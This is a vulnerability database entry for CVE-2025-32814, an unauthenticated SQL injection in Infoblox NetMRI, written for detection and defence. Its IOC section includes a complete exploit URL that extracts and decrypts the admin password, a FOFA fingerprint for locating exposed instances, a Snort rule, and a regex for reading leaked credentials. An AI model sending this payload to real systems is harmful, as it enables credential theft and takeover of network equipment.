cbcvebase.
CVE-2025-32814
published 2025-05-22

CVE-2025-32814: An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
36.41%
98.3th percentile
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.

Affected

1 ranges
VendorProductVersion rangeFixed in
infobloxnetmri< 7.6.17.6.1

Detection & IOCsextracted from sources · hover to see the quote

url/netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN
path/netmri/config/userAdmin/login.tdf
otherfofa-query: icon_hash="-319724102"
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/netmri/config/userAdmin/login.tdf|3f|"; fast_pattern; startswith; content:"skipjackUsername|3d|"; content:"netmridecrypt"; nocase; distance:0; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; classtype:attempted-admin; sid:2062742; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CVE_2025_32814, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_06_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit requests use HTTP GET to /netmri/config/userAdmin/login.tdf with the skipjackUsername parameter containing error-based SQL injection via updatexml() and the NetmriDecrypt() function to extract encrypted credentials from the skipjack.ACLUser table.
  • Successful exploitation produces an XPATH syntax error response in the HTTP body containing the extracted credential value between tilde (~) delimiters, matchable with regex: XPATH syntax error: '~(.*?)~'
  • Detection should look for the string 'netmridecrypt' (case-insensitive) in the URI query string following the skipjackUsername parameter, as this is the proprietary decryption function abused in the attack payload.
  • The Snort/ET rule (sid:2062742) targets HTTP GET requests where the URI starts with /netmri/config/userAdmin/login.tdf? and contains both skipjackUsername= and netmridecrypt (case-insensitive). TLS decryption (tls_state TLSDecrypt) is required for encrypted traffic inspection.
  • The attack is unauthenticated (PR:N) and network-reachable (AV:N), so any inbound GET to the login.tdf endpoint with SQL metacharacters in skipjackUsername from an unauthenticated session is suspicious.
  • ·The Snort rule (sid:2062742) requires TLS decryption to be effective against HTTPS-protected NetMRI deployments, as the attack payload travels in the URI query string.
  • ·The Nuclei template targets Infoblox NetMRI versions before 7.6.1; the FOFA fingerprint icon_hash=-319724102 can be used to identify exposed instances for proactive scanning.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.